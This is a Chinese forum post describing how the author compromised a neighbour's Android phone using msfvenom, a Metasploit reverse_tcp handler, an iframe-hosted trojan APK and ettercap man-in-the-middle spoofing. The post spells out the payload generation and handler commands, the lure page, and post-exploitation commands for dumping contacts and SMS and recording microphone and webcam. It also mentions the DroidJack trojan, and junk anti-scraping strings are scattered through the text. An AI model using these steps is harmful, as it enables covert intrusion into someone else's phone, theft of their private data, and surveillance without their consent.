metasploit+ettercap中间人攻击成功入侵邻居手机

admin · 发表于 2018-10-20 20:30:37

% _3 K6 i# B) s* P 五、msf+ettercap入侵邻居安卓手机 ; v m+ X0 ?- H. R) m

& [! l6 \4 V. j" z! c: X, h 首先启动msf . i7 E; M% o! N2 \& G5 K

8 }" z6 c7 c; b6 F 先用kali生成一个安卓木马，如下命令： " g6 P, w# f! h4 ]

' [, c4 o; Z. ?; d0 l; s5 E# [ Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk % d1 Y- R. Z( w

4 K3 w- ]) w/ L" v1 l1 y 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”，就不适用替换下载的方法了，据我所知，邻居频繁使用手机浏览器浏览新闻 9 u# z3 \- q" Z

/ C( l* g1 N) d; p' y 然后进入msf , C/ s9 E' `4 M3 q( |- f

: O. p P( y' L5 D use exploit/multi/handler 3 B' ?; \6 o+ E

% D% S7 T/ i% ?- J; n set payload android/meterpreter/reverse_tcp ; h( G8 w% z2 R2 L2 P4 e

\- l! B4 r) r set LHOST 192.168.0.109 //ip为kaili的ip 3 |5 d! m& u ^

+ @, G/ E+ u# u2 b/ X& J set LPORT 44444 //端口一定要与前面生成的木马的端口一致 + }1 L2 A0 w3 k" R* Q6 p

2 m0 V. Z& h' E! u8 I1 w m* W( x Exploit & } F: ~! A5 z/ w' J9 Z; h; b

6 |1 m: N4 ]' R/ C: E" M 3 ~4 @* M" @! a4 r; }+ P

' Q3 }. X- ]7 E9 ]! ] 下面我们开启ettercap -G . H9 \) h s) ^

`3 g/ J5 c' m. B$ g 我物理IP为 8 `( X: X- C+ t T

* F0 c. | t$ H% C1 L : Z& u: W- @3 i+ b- m# R# @

( @) {& { }1 \% E; h 别到时候再把我物理机欺骗了，之前测试物理机只装腾讯管家是可以成功欺骗的， 8 M( k7 _. B# U% J' z) {8 b0 U

1 Z+ i& [$ r! @( T# s) | 下面我们来设置一下 + w2 c' b) Y. B( B3 g

4 Y- s2 E9 R. ]$ u7 t1 _ 9 n3 Z/ S; X. l$ P" A) C1 }; O

7 M, L& m$ y Q {% c& M: i6 H 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下，并创建一个index.htm文件内容为：<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载，用iframe语句就OK了， & u- f1 l8 V' y% J- v

# j+ H4 {- z/ { R5 h; n6 m, f [, m; a7 Q- _* @) X, r

7 V ?$ J, C) T5 W7 @, k& f: V 5 b# Y0 S. R& |( w7 o

3 Z8 r& W$ }2 c7 d6 m* N 5 d5 C4 x! v" |# Z: h1 R0 O

& @" ^ D: \- z- Q1 ^+ l # v6 E/ [! T6 g" J

4 x. e7 K: r: U! } 7 _) G- v p& i1 a5 d

+ A- K6 z+ `% n/ ^. `+ U' _ 3 C& {+ ~: n1 ]% n- A

4 L; D+ j c4 k: d' `: k 5 h, p @. P( H9 X& P" U- T

& N# J) \- U% B* d+ Y# J/ s$ [ / M; r- t0 S; x8 j; j, \

$ f1 M" n0 G* Z: m; B" }. c9 w 0 s- w$ Q2 m/ o- n

/ G* f* j6 l% {- |6 a ! c2 T6 W" L, [9 N- o4 \8 j1 ~2 R

M7 J% m. U2 W4 K5 o- I- J$ s; T 5 b/ P9 ?8 r4 @3 z

0 x# E+ a3 S- \9 W" P: l * B$ D! Y f- _5 }

, L5 O* |1 L' y H! N c5 f" G, B/ Y, l

6 p0 d$ u# r I; g; b9 i8 [ 下面我们开始攻击 7 G! S, [+ m4 h$ t. F" N

& o' Z& A( _3 @6 _1 o& O! r! B 0 E; P8 j$ j$ z2 T! k

# l* f6 o6 Y4 z 8 e3 q0 D6 {0 J/ @

: C& w4 E+ m) d9 k, \ : b! S. v9 c; L- T2 F a1 L2 ^

( }+ A* o) e$ _3 ~& w 6 g w6 R0 { ?! [* T, Y+ r& y

4 y, v/ e. h0 f9 ~ * G8 W) U# m+ S" c u9 }2 a9 v

, T( l, F5 g3 y3 m/ C: O3 n1 I {5 Q 大概过了5分钟多，发现反弹成功了 . R$ @0 W3 A" \

' Z/ y* O) s7 `9 X. U ) Y% f% [. n8 t6 ^/ G) O

4 @ H6 }( C' s; Z- [ & k% O' ~$ S7 ?$ z# o/ }. S

3 b6 ^" l# y# e) p0 n& n 0 A; e4 M9 ^* t

Y9 X- {+ }3 b7 y! D/ x 9 S0 v* }" W5 w, G5 a8 \6 ~

3 v! B. b; h+ l D8 `0 X" N , |8 D8 f9 C# o9 E3 n8 V

" ^/ k) Z( x" U* ]+ @ 2 s8 ~1 V5 O0 @8 `& i

" d# g2 W- q1 r2 F q 5 J( B9 D# A0 R/ W8 E

6 T L2 l: e) e$ ~& \; e 执行命令 / M* }) ?% C8 O- f# b/ Q4 M

( e8 [$ [6 j5 v. A: u' L , C' x: @1 L' a- ?

; l! m7 Z4 W( m& n, K6 b, `1 U dump_contacts --》这个是导出电话 9 Z- \* ]# d, D7 f0 d

$ s( @2 u" O0 z, t# u dump_sms --》这个是导出信息 , t3 W3 ?6 |* |4 p

. ]* h4 d& Q$ P: R6 q6 P9 Q record_mic Record audio from the default microphone for X seconds , L- h! e* G1 M, ~( w7 S

, ]' ~5 B# @4 C8 g5 K webcam_chat Start a video chat D4 ?" A- S L7 d& G; i% g4 [

+ J' _7 c; t, C1 J2 h; k webcam_list List webcams * B9 K. d) A, k7 o! I2 H8 o( b

% Q" L) ] h4 Q8 Y, |: s webcam_snap Take a snapshot from the specified webcam 5 Z# Y; |7 E# |0 ^% G

% V' _9 j7 r) w v3 Q webcam_stream lay a video stream from the specified webcam ; m8 r* T; v" O

8 u: |" b3 q& E. I1 n2 {- g% m 8 z" D% o, ?9 e7 M) T' B

0 [! k) H6 g# f, w2 g; b' S! @ 2 x% ]) `; i( T5 \1 o+ w

$ b! E; U- p4 b3 p, h" W 我们打开看一下电话薄， * d! T1 |& Q4 g# W% ^2 {

7 \4 A: c# t# C j- h( V / U# j' H4 U2 v, e) A3 F

+ B9 \: i0 B/ W9 x( { . [+ I" b' r' K8 I+ t$ X

' g$ A4 L+ }8 |! K# l1 y 1 ~5 F/ F( _. B' U4 D* f

9 V8 t, {) q# h* a E ; K( L/ |. N# y. q

- d8 D+ z! i" l7 T0 {7 H7 |' | ( w: _7 c2 r5 f% P

* A* r' C6 r6 i2 E ; |# o& w2 @ }. O# i

) U' \* d v- a: V- [ {/ D+ {) V& G 我们同时欺骗成DroidJack木马，使用方法如图： 2 t8 l& t' ?- o

) {" j% n7 T \ ' w: d7 u* x. i4 m3 T* G" b. J

- E( k1 s# G( a* Z # m. {' G: E9 e" ]0 w/ ?

8 z8 K, E* |8 f/ J% T7 O+ E$ t m 9 \3 V% z+ M; A1 C3 S& h) @! [% V

! ]( [6 y5 t9 Q6 ] B1 J* v$ N, I 切记在前面生成完马以后记得在这里选择开关为on，并且对应前面生成马的时候的端口 3 b1 k: D$ H+ y0 W$ e3 p. o4 R

L. q( x* W! g0 `7 V , \" M4 i; U) J& R" H5 x+ r! T$ l

; N+ X4 ^9 V: B0 w3 k 5 V x) r* v7 X% L. ^9 s

7 \$ F6 J4 J2 J# @# x: N 1 F* r! o0 A( G5 B8 }6 T( P

* L* T8 C0 }$ @( Q( I# r ' }5 Z6 D7 w4 N+ f: C" u/ Z

V$ b! m: Z& D- s4 f! d
2 z$ B1 O Q; N! H

		自动登录	找回密码
密码			立即注册

metasploit+ettercap中间人攻击成功入侵邻居手机

浏览过的版块